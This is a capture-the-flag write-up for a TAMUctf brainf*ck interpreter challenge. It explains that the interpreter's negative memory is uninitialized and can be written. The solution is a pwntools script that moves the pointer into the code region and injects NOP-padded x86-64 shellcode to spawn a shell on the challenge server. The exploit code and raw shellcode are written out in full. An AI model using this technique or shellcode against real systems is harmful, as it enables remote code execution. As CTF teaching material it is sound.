Original description:

We’re taking a whole new way of looking at brainf*ck. Go and check it out! nc challenges.tamuctf.com 31337

Solution

Brainfuck basically has 8 commands (equivalent C code) - table borrowed from Wikipedia Instruction|equivalent C –|–

++ptr;
<	–ptr;
+	++*ptr;
-	–*ptr;
.	putchar(*ptr);
,	*ptr=getchar();
[	while (*ptr) {
]	}

And per definition, positive memory is initialized to 0.

But negative memory isn’t, so we enter 1000 “<.” to confirm that negative memory really is uninitialized.

As we don’t want to overwrite the code we are running, we insert buffer-code “<>” which shifts the pointer left and right.

After this print, our cursor is at -1000, so we insert 1000* “,>” (read and move to next memory) to directly overwrite the code that will run after all our input.

So our final program is: [print current memory, move left]*1000 + [shellcode pre-padded with 0x90 NOP to be aligned] + [any NOP code that can be overwritten of length 1000]

Solution Code

from pwn import *
shellcode = b'\x90'*0x20+b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
N = 1000

r = remote("challenges.tamuctf.com", 31337)
r.recvuntil(b"bf$ ")
r.sendline(b"<.[<.]"*N + b',>'*len(shellcode) + b"<>"*N)
r.sendline(shellcode)
r.interactive()